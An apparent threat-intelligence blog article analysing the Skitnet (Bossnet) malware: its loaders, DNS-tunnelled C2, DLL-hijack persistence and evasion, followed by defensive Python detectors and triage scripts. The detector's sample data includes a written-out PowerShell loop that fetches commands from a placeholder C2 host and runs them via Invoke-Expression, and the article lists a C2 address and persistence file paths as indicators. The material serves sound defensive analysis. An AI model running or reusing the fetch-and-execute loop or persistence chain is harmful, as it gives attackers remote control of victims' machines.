
Skitnet ("Bossnet") in 2025: Stealthy Malware Powering Sophisticated Ransomware Tactics

Ransomware gangs are continually refining their tactics to evade detection and maximize impact. A notable player in this landscape is Skitnet, also known as Bossnet, a sophisticated malware that has gained significant traction among ransomware operators in 2025. Let's dive deep and explore its origins, technical mechanisms, role in ransomware operations, statistical impact, and mitigation strategies, offering a comprehensive understanding of this emerging threat.

CYBERSECURITY | DEVELOPMENT AND ECONOMIC THREATS | CYBER WARFARE

Phillemon Neluvhalani

6/9/2025 · 8 min read

First... let's talk about its origin...

Emergence in the Cybercrime Ecosystem

Skitnet first appeared on underground forums like RAMP on April 19, 2024, marketed as a "compact package" that includes both the malware and a server-side control panel. Developed by a threat actor tracked as LARVA-306, Skitnet is designed for ease of use, featuring automated deployment via Bash scripts and anti-forensic capabilities that wipe logs, IP addresses, and command history. Its initial offering targeted cybercriminals seeking a versatile post-exploitation tool, but it wasn’t until early 2025 that Skitnet gained widespread adoption among ransomware gangs, as reported by Prodaft and other cybersecurity firms.

The malware’s rise coincides with a broader shift in the ransomware ecosystem, where law enforcement actions like Operation Endgame (May 2024) disrupted major botnets such as QakBot and IcedID. This created a demand for new tools that could fill the gap, and Skitnet’s affordability, modularity, and stealth features made it an attractive option. By April 2025, groups like Black Basta were observed using Skitnet in Microsoft Teams phishing campaigns targeting enterprise environments, while Cactus leveraged it for similar post-exploitation activities.

The Industrialization of Cybercrime

Skitnet’s availability on platforms like RAMP highlights the industrialization of cybercrime, where Malware-as-a-Service (MaaS) ecosystems democratize access to sophisticated tools. This allows less-skilled actors to deploy advanced attacks without deep technical expertise, amplifying the threat landscape. The malware’s rapid adoption in 2025 reflects a trend where ransomware gangs are increasingly relying on off-the-shelf solutions to streamline operations, reduce development costs, and complicate attribution.

How Skitnet Works: Infection Chain and Mechanisms

Skitnet operates as a multi-stage malware, leveraging a combination of programming languages, encryption, and stealth techniques to infiltrate systems, maintain persistence, and facilitate ransomware deployment. Below is a detailed breakdown of its infection chain and capabilities, based on analyses from Prodaft, The Hacker News, and other sources.

1. Initial Infection Vector: Phishing and Social Engineering

Skitnet is typically deployed after initial access has been gained, often through phishing campaigns or other social engineering tactics:

  • Microsoft Teams Phishing: Black Basta has been observed using Teams-themed phishing attacks to target enterprises, tricking users into executing malicious payloads.

  • Compromised Credentials: Attackers exploit stolen credentials or unpatched vulnerabilities in systems like Microsoft Exchange or VPNs to gain a foothold, then deploy Skitnet for post-exploitation.

  • Third-Party Software: Skitnet may be delivered via compromised third-party software or remote monitoring tools, a tactic increasingly common in ransomware attacks (Huntress, 2025 Cyber Threat Report).

2. Delivery and Execution

Skitnet’s infection begins with a Rust-based loader, which initiates a multi-stage process designed to evade detection:

  • Rust Loader: The initial executable, written in Rust, decrypts a ChaCha20-encrypted Nim binary and loads it directly into memory using reflective code loading (via the DInvoke-rs library). This in-memory execution avoids writing to the disk, reducing the likelihood of detection by traditional antivirus software.

  • Nim Payload: The decrypted Nim binary establishes a DNS-based reverse shell for communication with the command-and-control (C2) server. It initiates contact using randomized DNS queries, which blend into legitimate network traffic.

  • Multi-Threaded Operations: The Nim payload launches three threads:

    1. Heartbeat Thread: Sends periodic DNS requests to signal the malware’s presence.

    2. Output Tracking: Monitors and exfiltrates command output.

    3. Command Listener: Receives and decrypts commands from the C2 server via DNS responses.

3. Command-and-Control (C2) Communication

Skitnet uses a DNS-based C2 channel, a stealthy method that leverages DNS tunneling to communicate with its operators:

  • DNS Tunneling: Commands and responses are encrypted (using symmetric encryption) and encapsulated within DNS requests, often as TXT records. This allows Skitnet to evade network monitoring tools that focus on HTTP/HTTPS traffic.

  • Control Panel: Operators manage infected systems via a feature-rich C2 dashboard, which displays the target’s IP, location, and status. The panel supports a variety of commands, enabling remote control, data exfiltration, and payload delivery.

  • Dynamic API Resolution: Skitnet resolves Windows API functions dynamically using GetProcAddress, avoiding traditional import tables that could trigger detection.

4. Persistence Mechanisms

Skitnet employs sophisticated persistence techniques to ensure long-term access:

  • DLL Hijacking: Through the “startup” command, Skitnet downloads three files to C:\ProgramData\huo:

    1. ISP.exe: A legitimate, digitally signed executable from ASUSTeK Computer Inc.

    2. SnxHidLib.DLL: A malicious DLL that hijacks the execution flow when loaded by ISP.exe.

    3. pas.ps1: A PowerShell script that maintains C2 communication.

  The malware places a shortcut to ISP.exe in the Windows Startup folder, ensuring it runs on reboot. When ISP.exe loads, it calls LoadLibrary to import SnxHidLib.DLL, which executes pas.ps1. This script retrieves the C drive’s serial number and sends continuous requests to the C2 server (e.g., http://178.236.247.7/{serial_number}), awaiting further commands.

  • PowerShell Automation: The pas.ps1 script uses Invoke-Expression to execute remote PowerShell commands, creating a resilient feedback loop for ongoing control.

5. Post-Exploitation Capabilities

Skitnet’s versatility makes it a powerful tool for ransomware gangs, supporting a range of post-exploitation activities:

  • Screen Capture: The “screen” command captures a screenshot of the victim’s desktop using PowerShell, uploads it to Imgur, and sends the URL back to the C2 server.

  • Remote Access: Skitnet stealthily installs legitimate remote access tools like AnyDesk and RUT-Serv, hiding their windows and notification tray icons to avoid detection.

  • Data Exfiltration: The malware can steal sensitive data, such as intellectual property or customer information, which is often used in double extortion schemes (data theft followed by ransomware deployment).

  • Antivirus Enumeration: Using WMI queries, Skitnet lists installed antivirus and endpoint protection software, providing attackers with insights into the victim’s defenses.

  • Shell Access: The “shell” command opens a PowerShell loop, polling the C2 server every five seconds for new commands to execute via Invoke-Expression.

  • Additional Payloads: A .NET-based loader can be deployed via an encoded PowerShell dropper, using base64, XOR, and RC4 encryption to fetch and execute further payloads, extending Skitnet’s capabilities.

Evasion and Anti-Analysis Techniques

Skitnet’s design prioritizes stealth, employing multiple techniques to evade detection and analysis:

1. Stealth Communication

  • DNS Tunneling: By using DNS queries for C2 communication, Skitnet avoids traditional network monitoring focused on HTTP/HTTPS traffic. The use of randomized DNS queries and TXT records further obfuscates its activity.

  • Encrypted Traffic: Commands and responses are symmetrically encrypted, making it difficult to intercept or analyze C2 communications.

2. Code Obfuscation

  • Rust and Nim: The use of less common programming languages like Rust and Nim reduces detection rates, as many security tools are optimized for C/C++ or .NET-based threats.

  • In-Memory Execution: The Nim payload is loaded directly into memory using reflective code loading, leaving minimal forensic traces on the disk.

  • Obfuscated Strings: Skitnet employs string encryption and opaque predicates to hinder static analysis.

3. Anti-Forensic Measures

  • Log Wiping: The server component automatically wipes SSH logs, IP addresses, command history, and cache data, thwarting forensic investigations.

  • Dynamic API Handling: By resolving API functions at runtime, Skitnet avoids creating recognizable signatures in its import tables.

4. Living-Off-the-Land Techniques

  • Legitimate Tools: Skitnet abuses legitimate software like AnyDesk, RUT-Serv, and ASUS executables to blend into the system, reducing the likelihood of detection.

  • PowerShell Usage: The reliance on PowerShell for persistence and command execution leverages built-in Windows tools, aligning with the “living-off-the-land” trend observed in 75% of ransomware incidents in 2024 (Huntress, 2025 Cyber Threat Report).

Statistical Impact and Trends

Adoption and Scale

  • Timeline: First advertised on April 19, 2024, Skitnet saw significant adoption by ransomware gangs in early 2025, with notable campaigns observed by April 2025.

  • Key Actors: Groups like Black Basta and Cactus have deployed Skitnet in real-world attacks, particularly targeting enterprise environments.

  • Distribution: Skitnet is sold on underground forums like RAMP, making it accessible to a wide range of threat actors, from established gangs to smaller operators.

Trends in Ransomware Tactics

  • Rise in Post-Exploitation Tools: Skitnet’s adoption reflects a shift toward more sophisticated post-exploitation strategies, where ransomware gangs prioritize stealth, data theft, and persistence over immediate encryption.

  • Double Extortion: Skitnet facilitates double extortion by enabling data exfiltration before ransomware deployment, increasing pressure on victims to pay.

  • Use of Legitimate Tools: The malware’s reliance on tools like AnyDesk and PowerShell aligns with a broader trend where 17.3% of ransomware attacks in 2024 abused remote monitoring tools (Huntress, 2025 Cyber Threat Report).

  • Evasion of EDR: Skitnet’s design counters endpoint detection and response (EDR) solutions, a growing challenge as threat actors adapt to improved enterprise defenses.

Impact

  • Data Breaches: Skitnet’s ability to exfiltrate sensitive data poses risks of intellectual property theft, customer data leaks, and reputational damage.

  • Operational Disruption: By enabling ransomware deployment, Skitnet causes significant downtime, with the average cost of ransomware recovery reaching millions in 2025.

  • Repeated Exploitation: Its persistence mechanisms allow attackers to return for future attacks, even after ransom payment.

Let's Go Further In-Depth

Technical Sophistication

Skitnet’s multi-language architecture (Rust, Nim, .NET, PowerShell) and modular design make it a highly adaptable tool. The use of ChaCha20 encryption and DNS tunneling for C2 communication demonstrates a focus on evading traditional security measures, while its in-memory execution and reflective loading techniques minimize its digital footprint. The malware’s ability to dynamically resolve API functions and obfuscate strings further complicates analysis, making it a formidable challenge for defenders.

Role in Ransomware Operations

Skitnet plays a critical role in the double extortion paradigm, where ransomware gangs steal data before encrypting systems, using the threat of public disclosure to coerce payment. Its capabilities—data exfiltration, remote access, and persistence—enable attackers to maintain long-term control over compromised networks, facilitating lateral movement, privilege escalation, and strategic deployment of ransomware payloads. The use of legitimate tools like AnyDesk and RUT-Serv aligns with the “living-off-the-land” approach, allowing attackers to operate under the radar.

Comparison to Other Malware

Compared to other post-exploitation tools like TransferLoader (active since February 2025), which delivers the Morpheus ransomware using a three-component architecture, Skitnet stands out for its DNS-based communication and anti-forensic features. While TransferLoader uses the InterPlanetary File System (IPFS) as a fallback C2 channel, Skitnet’s reliance on DNS tunneling is more evasive, as DNS traffic is often overlooked by security tools. Additionally, Skitnet’s accessibility on underground forums contrasts with custom-built malware, making it a more democratized threat.

Attribution and Motives

While Skitnet is attributed to LARVA-306, its widespread availability on forums like RAMP complicates attribution, as multiple groups, including Black Basta and Cactus, have adopted it. The primary motive appears to be financial gain, as Skitnet enables double extortion and maximizes ransom payouts. However, its persistence capabilities suggest potential for espionage or future monetization, particularly in high-value targets like enterprises.

Mitigation Strategies

Defending against Skitnet requires a multi-layered approach that addresses its stealth, persistence, and post-exploitation capabilities:

1. Technical Defenses

  • DNS Traffic Monitoring: Monitor for unusual DNS queries, such as frequent TXT-record queries or non-standard requests, which may indicate Skitnet’s C2 communication.

  • Endpoint Detection and Response (EDR): Deploy EDR solutions with behavior-based analytics to detect suspicious activities like Rust/Nim payloads, PowerShell usage, and DLL hijacking.

  • PowerShell Restrictions: Limit PowerShell execution privileges to prevent unauthorized script execution, and enable command-line logging and auditing.

  • Network Segmentation: Limit east-west traffic within networks to prevent lateral movement by Skitnet.

  • Patch Management: Regularly patch vulnerabilities in Microsoft Exchange, VPNs, RDP services, and third-party software to prevent initial access.
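The DNS-based C2 channel described in section 3 above (and again under "Stealth Communication" and the DNS-monitoring bullet here) leaves a pattern in resolver logs that can be scored: a single client sending many TXT queries to one domain, each with a random-looking, rarely repeated leftmost label. The script below is an added example of that scoring and is not code from the article or from any vendor it cites; the log line format, the thresholds, and every IP address and domain in the sample are constructed for illustration.

```python
"""Flag DNS query patterns that resemble DNS-tunnelled C2 traffic.

Added example: detection logic over constructed resolver log lines, not code
from the article or from Prodaft. Log format, thresholds and all addresses
and domains below are assumptions for illustration.
"""
import math
import re
from collections import defaultdict

# Constructed sample log (timestamp, client IP, query type, query name).
# 10.0.0.44 issues a steady stream of TXT queries with random-looking labels;
# 10.0.0.12 is ordinary traffic, including one legitimate TXT lookup.
SAMPLE_LOG = """\
2025-06-09T10:00:01Z 10.0.0.12 A    www.example.com
2025-06-09T10:00:02Z 10.0.0.12 TXT  _dmarc.example.com
2025-06-09T10:00:05Z 10.0.0.44 TXT  k3j9x0q2m8v1z7b4.cdn-updates.example
2025-06-09T10:00:10Z 10.0.0.44 TXT  p9s2d8f4h6j1l3n5.cdn-updates.example
2025-06-09T10:00:15Z 10.0.0.44 TXT  a7c3e9g5i1k7m3o9.cdn-updates.example
2025-06-09T10:00:20Z 10.0.0.44 TXT  q2w4e6r8t0y2u4i6.cdn-updates.example
2025-06-09T10:00:25Z 10.0.0.44 TXT  z1x3c5v7b9n1m3a5.cdn-updates.example
2025-06-09T10:00:30Z 10.0.0.44 TXT  s8d6f4g2h0j8k6l4.cdn-updates.example
2025-06-09T10:00:31Z 10.0.0.12 AAAA mail.example.com
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+([A-Z]+)\s+(\S+)$")


def shannon_entropy(label):
    """Bits of entropy per character; random hostnames score higher than words."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Return (timestamp, client, qtype, qname) tuples, skipping malformed lines."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groups())
    return records


def base_domain(qname):
    """Crude registrable-domain guess: the last two labels. Fine for a demo;
    use a public-suffix list in production."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def find_dns_tunnel_candidates(records, min_txt=5, min_entropy=3.0, min_unique_ratio=0.8):
    """Group queries by (client, base domain) and flag groups that look like an
    uplink: many TXT queries whose leftmost labels are high-entropy and rarely repeat."""
    groups = defaultdict(list)
    for _ts, client, qtype, qname in records:
        groups[(client, base_domain(qname))].append((qtype, qname))
    findings = []
    for (client, domain), queries in groups.items():
        txt_names = [q for t, q in queries if t == "TXT"]
        if len(txt_names) < min_txt:
            continue
        labels = [q.split(".")[0] for q in txt_names]
        avg_entropy = sum(shannon_entropy(lbl) for lbl in labels) / len(labels)
        unique_ratio = len(set(labels)) / len(labels)
        if avg_entropy >= min_entropy and unique_ratio >= min_unique_ratio:
            findings.append({
                "client": client,
                "domain": domain,
                "txt_queries": len(txt_names),
                "avg_label_entropy": round(avg_entropy, 2),
                "unique_label_ratio": round(unique_ratio, 2),
            })
    return findings


if __name__ == "__main__":
    for finding in find_dns_tunnel_candidates(parse_log(SAMPLE_LOG)):
        print(finding)
```

The thresholds are starting points, not tuned values: DKIM, SPF and some security products legitimately generate bursts of TXT queries, so baseline per-domain TXT volume before alerting, and pair this with the resolver's answer data (large or frequent TXT responses to the same names) to catch the downlink side of the channel as well.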

2. User Education

  • Phishing Awareness: Train employees to recognize phishing attempts, particularly those impersonating Microsoft Teams or other enterprise tools.

  • Third-Party Software Risks: Educate users to download software only from official sources and verify the legitimacy of remote access tools like AnyDesk.

3. Proactive Measures

  • Threat Intelligence: Leverage threat intelligence feeds to stay updated on Skitnet’s indicators of compromise (IoCs), such as those published by Prodaft on GitHub.

  • Behavior-Based Detection: Focus on detecting abnormal behaviors, such as Invoke-Expression usage, scheduled tasks, or WMI events triggering remote scripts.

  • Zero Trust Architecture: Enforce strict identity verification and least-privilege access to reduce the impact of breaches.
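The behavior-based detection bullet above calls out Invoke-Expression usage; the article's own description of pas.ps1 and the "shell" command (a loop that fetches a command from the C2 server, runs it through Invoke-Expression, and sleeps five seconds) is exactly the combination that PowerShell script block logging (Event ID 4104) exposes. The following is an added example of scoring such log records, not code from the article; the event records are constructed, the C2 host is a placeholder, and the indicator list is an assumption a team would extend.

```python
"""Score PowerShell script-block log entries (Event ID 4104) for the
fetch-then-Invoke-Expression loop the article attributes to pas.ps1 and the
"shell" command.

Added example, not code from the article. The event records below are
constructed; the C2 host is a placeholder.
"""
import re

# Constructed 4104-style records reduced to the fields this check needs.
SAMPLE_EVENTS = [
    {"id": 1, "user": "CORP\\alice",
     "script": r"Get-ChildItem C:\Logs | Where-Object Length -gt 1MB"},
    {"id": 2, "user": "CORP\\bob",
     "script": 'Invoke-Expression "Get-Process | Sort-Object CPU"'},
    {"id": 3, "user": "NT AUTHORITY\\SYSTEM",
     "script": 'while ($true) { $r = Invoke-WebRequest -UseBasicParsing '
               '"http://C2_PLACEHOLDER/$serial"; Invoke-Expression $r.Content; '
               'Start-Sleep -Seconds 5 }'},
    {"id": 4, "user": "CORP\\carol",
     "script": "Invoke-WebRequest https://example.com/report.json -OutFile report.json"},
]

# (tag, regex) pairs. Individually weak; the scorer looks at combinations.
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(invoke-expression|iex)\b", re.I)),
    ("remote_fetch", re.compile(
        r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloaddata|net\.webclient)\b",
        re.I)),
    ("polling_loop", re.compile(r"while\s*\(\s*\$true\s*\).*start-sleep", re.I | re.S)),
    ("encoded_payload", re.compile(r"frombase64string|-encodedcommand", re.I)),
]


def score_script_block(script):
    """Return the indicator tags present and whether the combination warrants an alert."""
    tags = [tag for tag, rx in INDICATORS if rx.search(script)]
    # Invoke-Expression alone is common in admin tooling; require it to be paired
    # with a network fetch or a decode step. The polling loop is extra context.
    alert = "invoke_expression" in tags and (
        "remote_fetch" in tags or "encoded_payload" in tags)
    return {"tags": tags, "alert": alert}


def scan_events(events):
    """Run the scorer over 4104-style records and return only those that alert."""
    hits = []
    for ev in events:
        result = score_script_block(ev["script"])
        if result["alert"]:
            hits.append({"id": ev["id"], "user": ev["user"], "tags": result["tags"]})
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit)
```

This only works if script block logging is actually enabled (the "Turn on PowerShell Script Block Logging" policy) and the 4104 events are shipped off the host, since the article notes the malware wipes local history; regex indicators are also easy to dodge with aliases and string splitting, so treat the scorer as a triage filter feeding analysts rather than the sole control.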

4. Incident Response

  • Isolate Infected Systems: If Skitnet is detected, immediately isolate the affected system to prevent further communication with the C2 server.

  • Analyze Persistence: Check the Windows Startup folder and C:\ProgramData\huo for malicious files, and terminate the pas.ps1 script loop.

  • Recover Systems: Use offline backups to restore systems, as Skitnet does not encrypt files but facilitates ransomware deployment.
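The "Analyze Persistence" step above, together with the DLL-hijacking chain described in section 4 (ISP.exe, SnxHidLib.DLL and pas.ps1 staged in C:\ProgramData\huo, plus a Startup-folder shortcut to ISP.exe), can be turned into a repeatable triage check. The script below is an added example, not code from the article or from any incident-response vendor; it takes the file names and staging path from the article, uses the standard per-user and all-users Startup folder locations, and inspects shortcuts with a byte search rather than a full .lnk parser (an assumption that is good enough for triage, since a shortcut's target path is stored as ANSI and/or UTF-16LE text). The demo tree it builds is constructed, not real samples.

```python
"""Triage the Skitnet 'startup' persistence chain described in the article:
staged files in C:\\ProgramData\\huo and Startup-folder shortcuts pointing at them.

Added example, not code from the article. The demo tree is constructed; the
.lnk inspection is a heuristic byte search, not a full shortcut parser.
"""
import os
import tempfile
from pathlib import Path

# File names and staging folder attributed to the "startup" command in the article.
STAGED_NAMES = {"isp.exe", "snxhidlib.dll", "pas.ps1"}
DEFAULT_STAGING = Path(r"C:\ProgramData\huo")


def default_startup_dirs():
    """Per-user and all-users Startup folders (standard Windows locations)."""
    dirs = []
    appdata = os.environ.get("APPDATA")
    programdata = os.environ.get("ProgramData")
    if appdata:
        dirs.append(Path(appdata) / "Microsoft/Windows/Start Menu/Programs/Startup")
    if programdata:
        dirs.append(Path(programdata) / "Microsoft/Windows/Start Menu/Programs/StartUp")
    return dirs


def shortcut_references(lnk_path, needles=("isp.exe", "programdata\\huo")):
    """Heuristic .lnk check: look for the target path in ANSI and UTF-16LE form,
    the two encodings shortcut path strings use. Case-insensitive."""
    data = lnk_path.read_bytes().lower()
    return [n for n in needles
            if n.encode("ascii") in data or n.encode("utf-16-le") in data]


def triage_persistence(staging_dir=DEFAULT_STAGING, startup_dirs=None):
    """Report staged files and suspicious Startup shortcuts; chain_present is
    True only when both halves of the persistence mechanism are found."""
    if startup_dirs is None:
        startup_dirs = default_startup_dirs()
    findings = {"staged_files": [], "suspicious_shortcuts": []}
    if staging_dir.is_dir():
        for p in staging_dir.iterdir():
            if p.name.lower() in STAGED_NAMES:
                findings["staged_files"].append(str(p))
    for d in startup_dirs:
        if not d.is_dir():
            continue
        for p in d.iterdir():
            if p.suffix.lower() == ".lnk":
                matches = shortcut_references(p)
                if matches:
                    findings["suspicious_shortcuts"].append(
                        {"shortcut": str(p), "matches": matches})
    findings["chain_present"] = bool(findings["staged_files"]) and bool(
        findings["suspicious_shortcuts"])
    return findings


def build_demo_tree(root):
    """Construct a stand-in for an infected host: the three staged files plus a
    Startup shortcut whose UTF-16LE target points at ISP.exe. Placeholder bytes only."""
    staging = root / "huo"
    staging.mkdir()
    for name in ("ISP.exe", "SnxHidLib.DLL", "pas.ps1"):
        (staging / name).write_bytes(b"placeholder")
    startup = root / "Startup"
    startup.mkdir()
    (startup / "ISP.lnk").write_bytes(
        b"L\x00\x00\x00" + "C:\\ProgramData\\huo\\ISP.exe".encode("utf-16-le"))
    (startup / "Notes.lnk").write_bytes(
        b"L\x00\x00\x00" + "C:\\Users\\me\\notes.txt".encode("utf-16-le"))
    return staging, startup


def demo():
    """Run the triage against the constructed tree in a temporary directory."""
    staging, startup = build_demo_tree(Path(tempfile.mkdtemp()))
    return triage_persistence(staging, [startup])


if __name__ == "__main__":
    print(demo())  # constructed tree
    print(triage_persistence())  # real default locations on this host
```

On a live host, run it against the default locations and preserve anything it finds before removal (copy the staged files and the shortcut, and record the running PowerShell process tree), since pas.ps1 and the signed ISP.exe are the evidence that ties the persistence to the rest of the intrusion; the ISP.exe binary itself is legitimately signed, so the hijacked DLL and the shortcut are what matter, not the signature.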

Skitnet, also known as Bossnet, represents a significant evolution in ransomware tactics in 2025, enabling stealthy post-exploitation activities that challenge traditional cybersecurity defenses. Its multi-stage architecture, DNS-based communication, and use of legitimate tools make it a versatile and evasive threat, while its availability on underground forums amplifies its reach. As ransomware gangs like Black Basta and Cactus continue to adopt Skitnet, organizations must adapt by implementing advanced detection, monitoring, and response strategies. By understanding Skitnet’s mechanisms and staying proactive, businesses can mitigate the risks posed by this sophisticated malware and safeguard their digital environments against the rising tide of cybercrime.